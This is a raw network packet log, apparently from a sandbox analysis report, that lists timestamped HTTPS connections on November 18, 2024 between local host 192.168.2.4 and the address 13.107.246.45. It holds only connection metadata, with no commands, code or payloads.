                                            Nov 18, 2024 21:16:38.571767092 CET49790443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.571774006 CET4434979013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.577249050 CET4434978913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.577413082 CET4434978913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.577491999 CET49789443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.577713013 CET49789443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.577760935 CET4434978913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.577789068 CET49789443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.577805042 CET4434978913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.581240892 CET49794443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.581285954 CET4434979413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.581365108 CET49794443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.581564903 CET49794443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.581578016 CET4434979413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.701375008 CET4434979013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.701432943 CET4434979013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.701479912 CET49790443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.701827049 CET49790443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.701843023 CET4434979013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.701858997 CET49790443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.701864958 CET4434979013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.705662012 CET49795443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.705754995 CET4434979513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:38.705859900 CET49795443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.706017017 CET49795443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:38.706052065 CET4434979513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.162899971 CET4434979113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.164357901 CET49791443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.164431095 CET4434979113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.170862913 CET49791443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.170881033 CET4434979113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.184926033 CET4434979313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.185899973 CET49793443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.185945034 CET4434979313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.186388016 CET49793443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.186393976 CET4434979313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.199385881 CET4434979213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.200319052 CET49792443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.200333118 CET4434979213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.200768948 CET49792443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.200773954 CET4434979213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.297672987 CET4434979113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.297749996 CET4434979113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.297837019 CET49791443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.298212051 CET49791443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.298213005 CET49791443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.298252106 CET4434979113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.298281908 CET4434979113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.302176952 CET49796443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.302210093 CET4434979613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.302342892 CET49796443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.302578926 CET49796443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.302588940 CET4434979613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.313705921 CET4434979313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.313924074 CET4434979313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.314030886 CET49793443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.314132929 CET49793443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.314177990 CET4434979313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.314233065 CET49793443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.314249992 CET4434979313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.317456961 CET49797443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.317511082 CET4434979713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.317686081 CET49797443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.317868948 CET49797443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.317900896 CET4434979713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.332089901 CET4434979213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.332406044 CET4434979213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.332493067 CET49792443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.332537889 CET49792443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.332544088 CET4434979213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.332555056 CET49792443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.332560062 CET4434979213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.335875988 CET4434979413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.336333036 CET49794443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.336342096 CET4434979413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.336429119 CET49798443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.336462021 CET4434979813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.336539030 CET49798443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.336642981 CET49798443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.336656094 CET4434979813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.337079048 CET49794443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.337084055 CET4434979413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.440294981 CET4434979513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.441077948 CET49795443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.441135883 CET4434979513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.441567898 CET49795443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.441596985 CET4434979513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.468775034 CET4434979413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.469048023 CET4434979413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.469136953 CET49794443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.469543934 CET49794443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.469563007 CET4434979413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.469573975 CET49794443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.469579935 CET4434979413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.472610950 CET49799443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.472707987 CET4434979913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.472831011 CET49799443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.472968102 CET49799443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.472997904 CET4434979913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.569236994 CET4434979513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.569425106 CET4434979513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.569539070 CET49795443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.569806099 CET49795443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.569844007 CET4434979513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.569870949 CET49795443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.569886923 CET4434979513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.573717117 CET49800443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.573759079 CET4434980013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:39.573884010 CET49800443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.574223042 CET49800443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:39.574238062 CET4434980013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.062854052 CET4434979613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.064316988 CET49796443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.064346075 CET4434979613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.064990997 CET49796443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.064996004 CET4434979613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.083642960 CET4434979813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.084214926 CET49798443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.084223032 CET4434979813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.084645987 CET49798443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.084650040 CET4434979813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.196580887 CET4434979613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.196742058 CET4434979613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.196824074 CET49796443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.197078943 CET49796443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.197096109 CET4434979613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.197115898 CET49796443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.197120905 CET4434979613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.200728893 CET49801443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.200767994 CET4434980113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.200860977 CET49801443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.201045036 CET49801443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.201059103 CET4434980113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.216768980 CET4434979913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.217237949 CET4434979813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.217428923 CET4434979813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.217489004 CET49798443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.217581987 CET49799443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.217611074 CET49798443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.217617035 CET4434979813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.217628002 CET49798443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.217632055 CET4434979813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.217637062 CET4434979913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.218285084 CET49799443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.218298912 CET4434979913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.220959902 CET49802443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.220998049 CET4434980213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.221086025 CET49802443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.221231937 CET49802443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.221246958 CET4434980213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.326143980 CET4434980013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.327085018 CET49800443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.327109098 CET4434980013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.327649117 CET49800443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.327653885 CET4434980013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.346210003 CET4434979913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.346287966 CET4434979913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.346366882 CET49799443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.346606016 CET49799443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.346662998 CET4434979913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.346697092 CET49799443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.346713066 CET4434979913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.350399971 CET49803443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.350428104 CET4434980313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.350526094 CET49803443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.350743055 CET49803443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.350756884 CET4434980313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.460608006 CET4434980013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.460689068 CET4434980013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.460758924 CET49800443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.461074114 CET49800443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.461090088 CET4434980013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.461097956 CET49800443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.461102962 CET4434980013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.464809895 CET49804443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.464848042 CET4434980413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.464953899 CET49804443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.465157032 CET49804443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.465169907 CET4434980413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.959294081 CET4434980213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.960011005 CET49802443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.960030079 CET4434980213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.960526943 CET49802443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.960531950 CET4434980213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.971438885 CET4434980113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.971805096 CET49801443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.971821070 CET4434980113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.972155094 CET49801443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.972161055 CET4434980113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.973915100 CET4434979713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.974215031 CET49797443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.974236012 CET4434979713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:40.974523067 CET49797443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:40.974529982 CET4434979713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.086199045 CET4434980313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.086966991 CET49803443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.086983919 CET4434980313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.087493896 CET49803443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.087500095 CET4434980313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.091284037 CET4434980213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.091835022 CET4434980213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.091907978 CET49802443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.091949940 CET49802443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.091964006 CET4434980213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.091980934 CET49802443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.091986895 CET4434980213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.095343113 CET49805443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.095377922 CET4434980513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.095505953 CET49805443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.095782042 CET49805443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.095797062 CET4434980513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.106086016 CET4434979713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.106159925 CET4434979713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.106226921 CET49797443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.106378078 CET49797443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.106395960 CET4434979713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.106411934 CET49797443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.106417894 CET4434979713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.109252930 CET49806443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.109324932 CET4434980613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.109426975 CET49806443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.109677076 CET49806443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.109710932 CET4434980613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.175045967 CET4434980113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.176064968 CET4434980113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.176141977 CET49801443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.176198959 CET49801443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.176224947 CET4434980113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.176235914 CET49801443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.176242113 CET4434980113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.179601908 CET49807443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.179632902 CET4434980713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.179725885 CET49807443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.179886103 CET49807443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.179908991 CET4434980713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.218875885 CET4434980313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.219393969 CET4434980313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.219465971 CET49803443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.219698906 CET49803443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.219721079 CET4434980313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.219728947 CET49803443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.219733953 CET4434980313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.222246885 CET49808443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.222279072 CET4434980813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:41.222373962 CET49808443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.222498894 CET49808443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:41.222513914 CET4434980813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.434231997 CET4434980613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.434946060 CET49806443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.435024977 CET4434980613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.435594082 CET49806443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.435611010 CET4434980613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.437551022 CET4434980813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.437587023 CET4434980513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.438369989 CET49808443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.438395977 CET4434980813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.438507080 CET49805443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.438522100 CET4434980513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.438916922 CET49808443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.438925982 CET4434980813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.439019918 CET49805443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.439024925 CET4434980513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.442642927 CET4434980713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.443247080 CET49807443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.443254948 CET4434980713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.443628073 CET49807443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.443641901 CET4434980713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.446476936 CET4434980413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.446779013 CET49804443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.446798086 CET4434980413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.447361946 CET49804443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.447374105 CET4434980413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.565768003 CET4434980813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.567307949 CET4434980813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.567421913 CET49808443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.567487001 CET49808443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.567487001 CET49808443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.567513943 CET4434980813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.567526102 CET4434980813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.569453955 CET4434980613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.569479942 CET4434980513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.569525957 CET4434980613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.569590092 CET49806443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.569731951 CET49806443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.569791079 CET4434980613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.569840908 CET49806443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.569848061 CET4434980513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.569858074 CET4434980613.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.569885015 CET49805443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.570626974 CET49805443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.570641994 CET4434980513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.570698023 CET49805443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.570704937 CET4434980513.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.571769953 CET49810443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.571829081 CET4434981013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.571902037 CET49810443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.572231054 CET49810443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.572252035 CET4434981013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.572374105 CET4434980713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.572541952 CET4434980713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.572642088 CET49807443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.572642088 CET49807443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.572668076 CET49807443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.572673082 CET4434980713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.573704958 CET49811443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.573745966 CET4434981113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.573829889 CET49811443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.574007034 CET49811443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.574021101 CET4434981113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.575160027 CET49812443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.575177908 CET4434981213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.575279951 CET49812443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.575378895 CET49813443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.575434923 CET4434981313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.575489044 CET49812443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.575503111 CET4434981213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.575510025 CET49813443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.575699091 CET49813443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.575715065 CET4434981313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.579119921 CET4434980413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.579219103 CET4434980413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.579284906 CET49804443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.579389095 CET49804443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.579407930 CET4434980413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.579432964 CET49804443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.579443932 CET4434980413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.582230091 CET49814443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.582241058 CET4434981413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:42.582361937 CET49814443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.582590103 CET49814443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:42.582612038 CET4434981413.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.304763079 CET4434981313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.305447102 CET49813443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.305478096 CET4434981313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.306121111 CET49813443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.306126118 CET4434981313.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.307384014 CET4434981113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.308478117 CET49811443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.308502913 CET4434981113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.315371990 CET49811443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.315378904 CET4434981113.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.327265024 CET4434981013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.327764988 CET49810443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.327790022 CET4434981013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.328295946 CET49810443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.328305960 CET4434981013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.329133034 CET4434981213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.329474926 CET49812443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.329493046 CET4434981213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.329962015 CET49812443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:16:43.329972029 CET4434981213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:16:43.336375952 CET4434981413.107.246.45192.168.2.4
